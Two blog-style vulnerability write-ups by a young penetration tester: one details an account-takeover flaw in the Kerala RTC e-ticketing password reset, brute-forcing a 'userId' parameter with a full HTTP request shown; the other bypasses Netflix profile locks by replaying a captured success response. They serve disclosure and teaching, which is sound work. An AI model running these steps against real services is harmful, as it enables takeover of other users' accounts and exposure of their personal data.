How I Hacked Kerala Road Transport Corporation(KSRTC)?

Krishnadev P Melevila — Thu, 03 Feb 2022 08:13:39 +0000

Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration tester from Kerala, India.

To know more about me, Ask google assistant “Who is Krishnadev P Melevila” Or search for my name on Google.

Today it is about KSRTC!.

What is KSRTC?

Kerala State Road Transport Corporation is a state-owned road transport corporation in the Indian state of Kerala. It is one of the country’s oldest state-run public bus transport services. The corporation is divided into three zones, and its headquarters is in the state capital Thiruvananthapuram.

KSRTC offers an online e-ticketing system, where a user can create an account and able to book tickets. The user is able to manage PNR, cancel/edit/modify tickets, etc… with the e-ticketing account. The website includes data like the user's national identification number, date of birth, passenger details, etc…
Vulnerability: Authentication misconfiguration on password reset functionality

Impact: CRITICAL
Risks: Account takeover
Priority: P1
Scope: Full account takeover,Cancellation of other users tickets, View data of users,View PNR details of other users

Steps to reproduce:

Step 1:Visit https://online.keralartc.com/oprs-web/login/forgotpw.do

Step 2: Enter the previously registered attacker’s known email id and click submit

Step 3: Click the link received on entered mail id

Step 4: Enter a new password, submit and intercept that request on a web interceptor like burp suite.

Step 5: On the request, you can see a parameter named “userid”, Bruteforce that user id using intruder and send the request. You can easily brute-force that user id and change any user’s password very easily.

POST /oprs-web/user/updatePasswordNew.do HTTP/2
Host: online.keralartc.com
Cookie: <REDACTED>
Content-Length: 67
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://online.keralartc.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <REDACTED>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close

userId=1643727426333&newPassword=Pass123&rePassword=Pass123

Step 6: After a successful brute force, You will be able to see the user’s email on the home page. With that email login with the password, you had set in the previous step.

So that's all guys, This vulnerability is acknowledged by NCIIPC and CERT-IN!

Don’t forget to follow me on medium and other social media. Also please give your 50 claps for this write-up and that’s my inspiration to write more!!

My Instagram handle: https://instagram.com/krishnadev_p_melevila
My Twitter handle: https://twitter.com/Krishnadev_P_M
My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/
My Personnel website: http://krishnadevpmelevila.com/

How I Bypassed Netflix Profile Lock?

Krishnadev P Melevila — Sat, 15 Jan 2022 14:15:02 +0000

Hi hackers,
My name is Krishnadev P Melevila, Actually I write regularly on medium blog, and this is my first time in Dev.to, Actually I am a 19 year old self-learned cyber security analyst. To know more about me, Just search “Who is Krishnadev P Melevila” On Google or Ask your Google Assistant.

The vulnerability is that one can easily bypass Netflix profile lock with response manipulation.
Profile lock means, In Netflix, there is an option to add multiple users to one account and for the multiple accounts they can set up a profile lock for each profile with a 4 digit pin. So when someone login to the main account they are asked “Who is watching?”

so after clicking profile they need to enter the profile pin to access the browse section. But there is a vulnerability in that feature. Steps to reproduce is given below:

Step 1: Visit https://www.netflix.com/ and login with your account then you will be asked “ Who is watching?” like the above screenshot

Step2: Here all users except guests and children have profile locks. So we are going to bypass this lock.

Step3: To do that we need to know at least one profile pin, say the profile pin of Krishnadev is 1704 then I will enter that pin and intercept the response of that request on burp and copy that whole success response.

HTTP/2 200 OK
X-Robots-Tag: noindex, nofollow
X-Frame-Options: DENY
X-Debug-Tz: GMT+5.50
X-Netflix.request.toplevel.uuid: 7d4b8b6b-fed5-44de-973b-1e14de56366f-422157414
X-Netflix.execution-Time: 6
Content-Type: application/json;charset=UTF-8
Date: Mon, 27 Dec 2021 03:48:33 GMT
Content-Length: 48
Via: 2 i-01d773509d78ec561 (us-west-2)
Server: api-prod-website i-00db4a31230d33cec
X-Xss-Protection: 1; mode=block; report=https://www.netflix.com/ichnaea/log/freeform/xssreport
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Authorization,Content-Type,Content-Encoding,Accept,X-Netflix.application.name,X-Netflix.application.version,X-Netflix.esn,X-Netflix.device.type,X-Netflix.certification.version,X-Netflix.request.uuid,X-Netflix.originating.request.uuid,X-Netflix.user.id,X-Netflix.oauth.consumer.key,X-Netflix.oauth.token,X-Netflix.ichnaea.request.type,X-Netflix.Request.Routing,X-NETFLIX-PREAPP-PARTNER-ID, X-NETFLIX-PREAPP-INTEGRITY-VALUE, X-Netflix.Request.Priority,X-Netflix.Retry.Client.Policy,X-Netflix.Client.Request.Name,X-Netflix.Request.Retry.Policy,X-Netflix.Request.Retry.Policy.Default,X-Netflix.request.client.user.guid,X-Netflix.Request.NonJson.Headers,X-Netflix.esnPrefix,X-Netflix.browserName,X-Netflix.browserVersion,X-Netflix.osName,X-Netflix.osVersion,X-Netflix.uiVersion,X-Netflix.clientType,X-NETFLIX-PERSONALIZATION-ID,X-NETFLIX-DET-TOKEN,X-NETFLIX-DET-PARTNER-PAI,X-NETFLIX-RESPONSE-OVERRIDDEN,X-NETFLIX-DET-DEPRECATION
Access-Control-Expose-Headers: X-Netflix.Retry.Server.Policy,X-Netflix.Response.Tag,X-Netflix.Geo.Info,X-Netflix.request.inbound.identity.changed,Via,X-Netflix.Retry.Server.Policy.retryAfterSeconds,X-Netflix.Retry.Server.Policy.maxRetries,X-Ftl-Error,X-Netflix.uiVersion
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Origin: https://www.netflix.com
X-Originating-Url: http://www.netflix.com/api/shakti/v5185b692/profileLock
X-Netflix.nfstatus: 1_1
Set-Cookie: <REDACTED>
X-Netflix.proxy.execution-Time: 16
{"codeName":"S-Icarus-6.Alster","success":true}

Step4: Now let us bypass the profile lock of any other user, To do that first enter a wrong pin for any user and intercept the response of that request and replace the response with the above success response. and BOOM!! We got access to the Other user profiles without any authentication.

I reported this to Netflix, But they said that:

Hi krishnadevpmelevila,
The functionality is only intended as a barrier for children accessing mature content within an account. Local bypass, such as this one, is considered Won't Fix. Your effort is appreciated and we hope that you will continue to research and submit any future security issues you find.

But, My doubt is that, Then what is the use of that feature?
Don’t forget to follow me on Dev.to and other social media and that's my inspiration to write more!!

My Instagram handle
My Twitter handle
My LinkedIn handle
My Personnel website

DEV Community: Krishnadev P Melevila

How I Hacked Kerala Road Transport Corporation(KSRTC)?

How I Bypassed Netflix Profile Lock?